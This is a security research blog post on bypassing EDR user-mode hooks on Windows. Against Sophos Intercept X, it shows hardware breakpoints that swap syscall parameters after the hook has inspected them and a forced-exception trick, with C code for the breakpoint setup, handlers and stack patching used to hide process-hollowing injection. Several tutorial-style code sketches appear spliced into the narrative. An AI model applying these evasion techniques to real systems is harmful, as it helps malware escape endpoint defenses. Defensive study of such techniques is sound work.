Silly EDR Bypasses and Where To Find Them


Recently I was testing some EDR’s abilities to detect indirect syscalls, and I had an idea for a quirky bypass.
If you’re not already familiar with direct and indirect syscalls, I recommend reading this article first.

One of the drawbacks of direct & indirect syscalls is that it’s clear from the callstack that you bypassed the EDR’s user mode hook.
Below are some example callstacks from direct, indirect, and regular calls.

The callstack of a direct syscall.

The callstack of an indirect syscall.

The callstack of a regular hooked Nt function call.

As you can see from the last image, when a call is done through a hooked function the return address for the EDR’s hook appears in the callstack (in my case this is hmpalert).
It’s an interesting dilemma: we don’t want to call the hooked function because that could trigger a detection, but if we bypass the hook entirely, that could trigger a detection too.

This is when I had somewhat of a funny idea. What if I do call the hooked function, but do it in such a way that the EDR isn’t able to properly inspect the call parameters?
Right off the bat, I had a couple of ideas.

TOCTOU

Time-of-check to time-of-use, or TOCTOU for short, is a technique often used in software exploitation.
The vulnerability arises when a security check is performed on an object, but nothing prevents that object from being modified between the time it’s checked and the time it’s used.

Let’s take the following code as an example:

BOOL CopyData(char *src_buffer, uint32_t *src_size) {
  static char dest_buffer[1024];

  if (*src_size >= 1024) {
    printf("error, buffer overflow!\n");
    return FALSE;
  }

  memcpy(dest_buffer, src_buffer, *src_size);
  return TRUE;
}

In the above, src_size is a pointer to an integer.
The function fails if the specified size is greater than or equal to the size of the destination buffer.
Since src_size is a pointer, the program passes the address of the variable to the function instead of its value.
During the function’s execution, it’s entirely possible for the program to change the value pointed to by src_size.

If the attacker manages to perfectly time changing the value of src_size so that it occurs after if(*src_size >= 1024), but before the memcpy() call, they can still trigger a buffer overflow.
The value only needs to be less than 1024 until after the if statement is complete, then it can be set to a value larger than dest_buffer.

Note: the above example is highly oversimplified, and in the real world the compiler would likely optimize this code to only read the value of *src_size once.
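For contrast, the usual way to close this kind of window is to read the shared value exactly once and use that snapshot for both the check and the copy. The sketch below is a portable variant of the example above, not code from the PoC; copy_data_once and DEST_SIZE are names made up for illustration, and the volatile-qualified parameter is just one assumed way of making the single read explicit.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define DEST_SIZE 1024  /* hypothetical name for the destination buffer size */

static char dest_buffer[DEST_SIZE];

/* Returns 1 on success, 0 if the requested size does not fit. */
int copy_data_once(const char *src_buffer, const volatile uint32_t *src_size) {
    assert(src_buffer != NULL && src_size != NULL);

    /* Read the shared size exactly once. Later changes to *src_size
       cannot affect the check or the copy below. */
    uint32_t size = *src_size;

    if (size >= DEST_SIZE) {
        return 0;
    }

    memcpy(dest_buffer, src_buffer, size);
    return 1;
}
```

The same reasoning applies to a hook: if the inspected values are snapshotted and the snapshot is what gets used, swapping the originals afterwards achieves nothing. The caller still has to guarantee that src_buffer holds at least size bytes.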

My initial idea was to take advantage of a similar race condition against the EDR’s hook.
Call a hooked function with benign parameters, then quickly swap them out with malicious ones mid-call.
If we can time the change to occur after the EDR has finished inspecting the parameters, but before the syscall instruction, we can bypass the hook without actually bypassing it.

Whilst trying to figure out if there was a way I could avoid modifying the parameters too soon and triggering a detection event, I had another, better, idea.

Idea 2: Hardware Breakpoints

This idea was even simpler.
Pick an ntdll function I want to call that’s hooked by the EDR, then place a hardware breakpoint on the syscall instruction.
Hardware breakpoints allow us to tell the CPU to trigger an exception whenever a certain address is read, written, or executed.
So, by placing an execute breakpoint on the syscall instruction we’ll be able to intercept execution after the EDR has completed its checks, but before the system call occurs.
This basically allows us to hook the EDR’s hook and turn any legitimate call into a custom syscall.

What we’ll be able to do is call a hooked function with benign parameters that won’t trigger a detection, then swap out the parameters with malicious ones after the EDR has already inspected the call.
We can even, if we want, change the system call number to invoke a different syscall than the one the EDR thinks we’re making.
The hardware breakpoint will be triggered right after the EDR has inspected our fake parameters, but before the syscall instruction transitions to kernel mode.

When the kernel returns to user mode, it’ll return to the instruction immediately after the syscall, which is where we can place a second breakpoint.
The second breakpoint handler can then change the parameters back to prevent the changes being caught by any post-call inspection the EDR might do.
In many cases the EDR won’t bother with post-call inspection if the call failed, so we could also just change the EAX register to something like STATUS_NOT_FOUND, STATUS_INVALID_PARAMETER, or in homage to the TDSS rootkit: STATUS_TOO_MANY_SECRETS.

An example of code flow from a hooked NtWriteFile function.

The call flow will go something like this:

1. Call hooked Nt function with benign parameters
2. EDR inspects benign parameters
3. EDR passes control back to the hooked Nt function to perform a syscall
4. Our 1st breakpoint is triggered and we replace parameters with malicious ones
5. We continue execution so the syscall is triggered
6. The kernel uses our real parameters then returns to the Nt function
7. Our 2nd breakpoint is triggered and we change parameters back
8. The EDR performs any post-call inspection and only sees benign parameters

Ideally, the best targets are functions that use CPU registers or memory pointers for parameters.
If we start modifying stack variables, this could show up during callstack unwinding.

Finding A Suitable Target

In order to test my idea, I wanted to come up with a function call that would immediately trigger a detection event.
This actually proved a lot harder than I thought it would be.
Many operations that I was sure would trigger a detection didn’t.
In the end, I settled for using my old process injection code.

The code works somewhat like process hollowing.
It creates a new process in a suspended state, injects itself into the suspended process, then uses SetThreadContext() to change the entrypoint of the main thread to the entrypoint of the malicious code.
The target I chose was Sophos Intercept X, because it advertises detection of process hollowing attacks.

If we reverse engineer the user mode hook, we can see exactly how process hollowing is detected.

A snippet of the EDR’s NtSetContextThread hook handler.

Whenever a new thread is created its instruction pointer is set to RtlUserThreadStart().
The first parameter of RtlUserThreadStart is the thread’s entrypoint, which will be called after the function is done initializing the new thread.
In a brand-new process there is only one thread, the main thread, which is responsible for calling the executable’s entrypoint.

During process hollowing, the executable’s code is unmapped and replaced with malicious code.
Since it’s unlikely the old and new code will have the exact same entrypoint address, it’s usually necessary to change the thread’s start address.
By changing the first parameter of RtlUserThreadStart() (the RCX register), we change the entrypoint of the thread, and therefore the entrypoint of the process.

Sophos’ detection simply checks if the code is trying to use NtSetContextThread() to change the RCX register of a new thread, which is suspicious behavior.
Since we can specify whatever entrypoint we want when creating a new thread, it doesn’t make sense to change it post-creation.
The only reason to do this is if the thread was created by something else, say, the PE Loader.

Bypassing The Check With Hardware Breakpoints

There’s actually quite a few ways I can think of to bypass this check, but I’m only interested in experimenting with CPU exceptions.
For our first example, we’re simply going to set a breakpoint on the syscall and retn instructions of NtSetContextThread().

Below is some example code I wrote to find these instructions.

// find the address of the syscall and retn instructions within an Nt* function
BOOL FindSyscallInstruction(LPVOID nt_func_addr, LPVOID* syscall_addr, LPVOID* syscall_ret_addr) {
    BYTE* ptr = (BYTE*)nt_func_addr;

    // clear the outputs so the "not found" check below is reliable
    *syscall_addr = NULL;
    *syscall_ret_addr = NULL;

    // iterate through the native function stub to find the syscall instruction
    for (int i = 0; i < 1024; i++) {

        // check for syscall opcode (0F 05)
        if (ptr[i] == 0x0F && ptr[i + 1] == 0x05) {
            printf("Found syscall opcode at %llx\n", (DWORD64)&ptr[i]);
            *syscall_addr = (LPVOID)&ptr[i];
            *syscall_ret_addr = (LPVOID)&ptr[i + 2];
            break;
        }
    }

    // make sure we found the syscall instruction
    if (!*syscall_addr) {
        printf("error: syscall instruction not found\n");
        return FALSE;
    }

    // make sure the instruction after syscall is retn (C3)
    if (**(BYTE**)syscall_ret_addr != 0xc3) {
        printf("error: syscall instruction not followed by retn\n");
        return FALSE;
    }

    return TRUE;
}
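To make the byte pattern concrete, here is a small portable sketch of the same scan that runs on an ordinary byte buffer instead of live ntdll memory. It is an illustration rather than part of the PoC: find_syscall_ret and sample_stub are hypothetical names, the sample bytes only resemble a typical x64 stub, and the syscall number 0x18 is a placeholder. Unlike the function above, it takes an explicit length and matches syscall and ret in a single step.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Returns the offset of the first "syscall; ret" sequence (0F 05 C3)
   in code[0..len), or -1 if there is none. */
long find_syscall_ret(const uint8_t *code, size_t len) {
    assert(code != NULL);

    /* Three bytes are needed: 0F 05 (syscall) followed by C3 (ret). */
    for (size_t i = 0; i + 2 < len; i++) {
        if (code[i] == 0x0F && code[i + 1] == 0x05 && code[i + 2] == 0xC3) {
            return (long)i;
        }
    }
    return -1;
}

/* Bytes resembling an x64 syscall stub; 0x18 is a placeholder number. */
static const uint8_t sample_stub[] = {
    0x4C, 0x8B, 0xD1,             /* mov r10, rcx  */
    0xB8, 0x18, 0x00, 0x00, 0x00, /* mov eax, 0x18 */
    0x0F, 0x05,                   /* syscall       */
    0xC3                          /* ret           */
};
```

Calling find_syscall_ret(sample_stub, sizeof sample_stub) locates the syscall at offset 8, right after the two mov instructions. A raw byte scan like this can in principle match bytes that belong to an operand rather than an opcode, which is one reason a disassembler would be the more robust choice.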

Unfortunately, the debug registers are privileged registers, which means we can’t set them directly from user mode.
In order to set up a hardware breakpoint, we need to use NtSetContextThread(), which is a bit ironic.
We’ll basically be using NtSetContextThread to bypass the hook on NtSetContextThread.

To set up our hardware breakpoints we’ll need to set DR0 and DR1 to the addresses we want to break on, then DR7 tells the CPU what type of breakpoints we want.

thread_context.ContextFlags = CONTEXT_FULL;

// get the current thread context (note, this must be a suspended thread)
GetThreadContext(thread_handle, &thread_context);

dr7_t dr7 = { 0 };

dr7.dr0_local = 1; // set DR0 as an execute breakpoint
dr7.dr1_local = 1; // set DR1 as an execute breakpoint

thread_context.ContextFlags = CONTEXT_ALL;

thread_context.Dr0 = (DWORD64)syscall_addr;     // set DR0 to break on syscall address
thread_context.Dr1 = (DWORD64)syscall_ret_addr; // set DR1 to break on syscall ret address
thread_context.Dr7 = *(DWORD*)&dr7;

// use SetThreadContext to update the debug registers
SetThreadContext(thread_handle, &thread_context);
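The dr7_t type used above is not shown in this post, so as a rough illustration of what those bitfields encode, the sketch below builds the same DR7 value with plain shifts. The helper name dr7_local_bits and the BP_* constants are my own and not part of the PoC; the bit positions follow the x86 debug register layout (local enable bits at 0, 2, 4 and 6, with a 2-bit R/W field and a 2-bit LEN field per breakpoint starting at bit 16).

```c
#include <assert.h>
#include <stdint.h>

/* Condition values for the DR7 R/W fields (names are illustrative). */
enum { BP_EXECUTE = 0x0, BP_WRITE = 0x1, BP_READ_WRITE = 0x3 };

/* Build the DR7 bits that enable one local breakpoint.
   index:    debug register number, 0-3
   cond:     one of the BP_* values
   len_bits: encoded LEN field (0 = 1 byte, required for execute breakpoints) */
uint32_t dr7_local_bits(unsigned index, unsigned cond, unsigned len_bits) {
    assert(index < 4 && cond < 4 && len_bits < 4);

    uint32_t value = 0;
    value |= 1u << (index * 2);                      /* L0-L3 local enable bit */
    value |= (uint32_t)cond << (16 + index * 4);     /* R/W field              */
    value |= (uint32_t)len_bits << (18 + index * 4); /* LEN field              */
    return value;
}
```

Enabling DR0 and DR1 as execute breakpoints therefore comes out as dr7_local_bits(0, BP_EXECUTE, 0) | dr7_local_bits(1, BP_EXECUTE, 0), which is 0x5. Because execute breakpoints use zero for both the R/W and LEN fields, only the two enable bits end up set, matching the dr0_local and dr1_local assignments above.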

Inside the breakpoint handler, we’ll just alter the RCX and RDX registers, which contain argument 1 and argument 2 of NtSetContextThread().
Prior to the call we can store the real values in a global variable, call NtSetContextThread with some fake values, then have our exception handler replace the fake values with the real ones.

Since the system call stub moves the first parameter from RCX into R10, we’ll set both just to be safe.

LONG WINAPI BreakpointHandler(PEXCEPTION_POINTERS e)
{
	// hardware breakpoints trigger a single step exception;
	// anything else is not ours, so pass it on to the next handler
	if (e->ExceptionRecord->ExceptionCode != STATUS_SINGLE_STEP) {
		return EXCEPTION_CONTINUE_SEARCH;
	}

	// this exception was caused by DR0 (syscall breakpoint)
	if (e->ContextRecord->Dr6 & 0x1) {
		// replace the fake parameters with the real ones
		e->ContextRecord->Rcx = (DWORD64)g_thread_handle;
		e->ContextRecord->R10 = (DWORD64)g_thread_handle;
		e->ContextRecord->Rdx = (DWORD64)g_thread_context;
	}

	// this exception was caused by DR1 (syscall ret breakpoint)
	if (e->ContextRecord->Dr6 & 0x2) {
		// set the parameters back to fake ones
		// since x64 uses registers for the first 4 parameters, we don't need to do anything here
		// for calls with more than 4 parameters, we would need to modify the stack
	}

	e->ContextRecord->EFlags |= (1 << 16); // set the ResumeFlag to continue execution

	return EXCEPTION_CONTINUE_EXECUTION;
}

We can only read/write the context of a suspended thread, so we’ll just create a new suspended thread to call NtSetContextThread().
We’ll use NtSetContextThread(NULL, NULL) for our fake parameters.

DWORD WINAPI SetThreadContextThread(LPVOID param) {
    NtSetContextThread(NULL, NULL);
    return 0;
}

// calling our special NtSetContextThread
SetUnhandledExceptionFilter(BreakpointHandler);
HANDLE new_thread = CreateThread(NULL, 0, SetThreadContextThread, NULL, CREATE_SUSPENDED, NULL);
SetSyscallBreakpoints((LPVOID)NtSetContextThread, new_thread);
ResumeThread(new_thread);

The Result

First, let’s see what happens when we just call NtSetContextThread() normally.

Now, again, but with our special breakpoint sauce:

Success! The code was able to inject itself into notepad and display a message box.

But, I actually want to go one step better. Having to call NtSetContextThread to set up our hardware breakpoints isn’t great.
The EDR could use its NtSetContextThread hook to see if we’re trying to set breakpoints that’d interfere with the EDR.
So, what about regular old exceptions?

Idea 3: Intentional Exception

Instead of hardware breakpoints, we’re going to try to cause a CPU exception.
Regular exceptions can be handled in the exact same way as breakpoint exceptions, but we don’t need to call NtSetContextThread() to set them up.

We already know the EDR inspects the context structure whenever we call NtSetContextThread(), so let’s use that to our advantage.
Most software checks if an address is NULL before trying to read it, but what if it’s neither NULL nor a valid address?
What happens if we set the context address to 0x1337?

Let’s try the following:

HANDLE thread_handle = CreateThread(NULL, 0, test_thread, NULL, CREATE_SUSPENDED, 0);
SetThreadContext(thread_handle, (CONTEXT*)0x1337);

Then we run it and…

Whoops, the EDR’s hook tried to read the invalid memory and crashed the process.

Now we have an easy way of triggering an exception without any hardware breakpoints.
The tricky part is the exception occurs inside the EDR’s handler, not directly before the syscall, so it’s much harder to replace the fake parameters with the real ones.
We also need to properly handle the exception so the process won’t crash.

From a combination of the crashdump and our earlier disassembly, we already know the EDR is trying to read the context->Rcx field into the RDX register.

The exception is triggered on line 1 of this pseudocode.

We could use a disassembler to make a more generic bypass, but since this is just a PoC, we’ll hardcode it to this specific EDR version.
The instruction that triggers the exception is mov rdx, qword [rbx+0x80], which means the context pointer (0x1337) is in RBX.
We’ll simply set RBX to point to an empty CONTEXT structure, which will result in thread_context->Rcx being zero, and the EDR not triggering a detection.

For the syscall to succeed now that the EDR’s check has been bypassed, we still need to fix the invalid context pointer.
The function where the exception occurs is only responsible for inspecting our context structure and doesn’t initiate the syscall.
However, the context pointer that is passed to the syscall is saved somewhere on the stack by the EDR.
The lazy fix is to just walk the stack and replace every instance of 0x1337 with the address of our real context structure.

// exception handler for forced exception
LONG WINAPI ExceptionHandler(PEXCEPTION_POINTERS e)
{
	static CONTEXT fake_context = { 0 };

	printf("Exception handler triggered at address: 0x%llx\n", (DWORD64)e->ExceptionRecord->ExceptionAddress);
	
	DWORD64* stack_ptr = (DWORD64*)e->ContextRecord->Rsp;
	
	// iterate first 300 stack items, looking for our fake address
	for (int i = 0; i < 300; i++) {
		if (*stack_ptr == 0x1337) {
			// replace the fake address with the real one
			*stack_ptr = (DWORD64)g_thread_context;

			printf("Fixed stack value at RSP+(0x8*0x%x) (0x%llx): 0x%llx\n", 
				   i, (DWORD64)stack_ptr, (DWORD64)*stack_ptr);
		}
		stack_ptr++;
	}
	
	// The pointer to our invalid address is in RBX, so replace it with an empty structure
	// the RCX member of the context structure being NULL will cause the EDR to skip its check
	e->ContextRecord->Rbx = (DWORD64)&fake_context;

	return EXCEPTION_CONTINUE_EXECUTION;
}
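The stack walk in the handler boils down to a bounded search-and-replace over 8-byte slots. The sketch below isolates that step as a portable function so it can be tried on an ordinary array; patch_sentinel is a hypothetical helper name and is not part of the PoC.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Replace every slot equal to `sentinel` with `replacement`.
   Returns the number of slots that were patched. */
size_t patch_sentinel(uint64_t *slots, size_t count,
                      uint64_t sentinel, uint64_t replacement) {
    assert(slots != NULL || count == 0);

    size_t patched = 0;
    for (size_t i = 0; i < count; i++) {
        if (slots[i] == sentinel) {
            slots[i] = replacement; /* swap the fake pointer for the real one */
            patched++;
        }
    }
    return patched;
}
```

In the handler, slots would correspond to the saved RSP, count to 300, sentinel to 0x1337, and replacement to the address of the real context structure. A short value like 0x1337 could plausibly collide with unrelated data on the stack, so a more distinctive invalid address would presumably reduce the chance of patching the wrong slot.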

Now we just run the code and see what happens…

Nice! It works.

So there we have it, two ways to bypass EDR hooks without bypassing EDR hooks.
Though, I’m not sure how practical or easy it would be to turn the forced exception method into a generic EDR bypass.
Since we can’t easily change pointers back after the syscall, and it only works with calls where the EDR reads pointers,
it’s fairly limited. The first method is far more generic, but probably also far easier to write detections for.

It’s possible we could combine both methods due to the fact exception handlers allow us to modify a thread’s context without the use of NtSetContextThread().
We could force an exception, then use the exception handler to set up our hardware breakpoints.

But anyway, I’m going to leave it there. This was just a fun little weekend side project I figured I’d post. Hopefully someone will find this information helpful.

I’ve uploaded the full process injection proof of concept to my GitHub here: github.com/MalwareTech/EDRception
